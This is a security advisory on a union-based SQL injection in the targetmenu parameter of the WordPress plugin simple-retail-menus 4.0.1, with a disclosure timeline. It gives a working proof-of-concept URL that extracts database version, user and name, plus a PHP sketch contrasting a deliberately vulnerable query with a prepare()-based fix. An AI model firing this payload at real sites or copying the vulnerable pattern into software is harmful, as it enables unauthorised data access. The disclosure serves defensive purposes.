wp-plugin : simple-retail-menus – A1-Injection

 

Plugin Details

 

Plugin Name : simple-retail-menus

 

Affected Version : 4.0.1 (and most probably lower versions, if any)

 
Vulnerability : A1-Injection (SQL injection)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Editor

 

PoC (Proof of Concept) :

 

http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8

 

Vulnerable Parameter : targetmenu

The value of targetmenu is placed into the menu-lookup query without escaping or type checking. The UNION SELECT carries eight columns so that it matches the column count of the original query, and the values it selects (@@version, user(), database()) come back where the menu fields would normally appear: a union-based SQL injection. Because the page lives under wp-admin, the request has to be made by an authenticated user with at least the Editor role (see "Minimum Level of Access Required" above); it is not reachable anonymously.

 

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1
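
The shape of the bug and of the fix, as an added illustration that is not the plugin's own code (the real handler and its patch are in the Trac changeset linked above). Only the parameter name targetmenu comes from the advisory; the table name, the column layout and the function names are assumptions:

```php
<?php
// Added illustration, not code from simple-retail-menus. Table name, columns and
// function names are assumed; only the targetmenu parameter is from the advisory.

// Vulnerable pattern: the raw query-string value is concatenated into the SQL text,
// so "2 union select @@version,2,user(),database(),5,6,7,8" becomes part of the query.
function jsrm_load_menu_vulnerable( $wpdb, array $get ) {
    $table = $wpdb->prefix . 'jsrm_menus';   // assumed table name
    $id    = $get['targetmenu'];             // unvalidated user input
    return $wpdb->get_row( "SELECT * FROM {$table} WHERE id = {$id}" );
}

// Hardened pattern: coerce the identifier to a non-negative integer and bind it
// through $wpdb->prepare() with a %d placeholder.
function jsrm_load_menu_fixed( $wpdb, array $get ) {
    $table = $wpdb->prefix . 'jsrm_menus';   // assumed table name
    // absint() is abs((int) $value): "2 union select ..." becomes 2, "abc" becomes 0.
    $id = isset( $get['targetmenu'] ) ? absint( $get['targetmenu'] ) : 0;
    if ( 0 === $id ) {
        return null;                         // no valid menu id supplied
    }
    // %d is rendered by prepare() as an integer literal, so nothing from the
    // request string can reach the SQL text.
    return $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id )
    );
}
```

The integer cast alone already defeats this particular PoC, but prepare() is the check to insist on in review: it keeps the query safe even if a later change turns the id into a string column, and it is the pattern WordPress core expects for any value that originates in $_GET or $_POST.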

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-25

 
Plugin Status : Updated on 2014-02-19
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Perfect for salon, restaurant, and retail store websites, as well as many other applications. Simple Retail Menus lets you create and manage menu-type lists for display in a post or page. This is a free, full-featured plugin. Create as many menus as you want, add as many items as you want to any menu, add menus to any post or page on your WordPress site.

It's simple and easy to use! Just build your menus, then copy/paste the resulting 'shortcode' into your post or page.

Example of a shortcode: [simple-retail-menu id="1"]


= Plugin's Official Site =

http://whatwouldjessedo.com/simple-retail-menus/
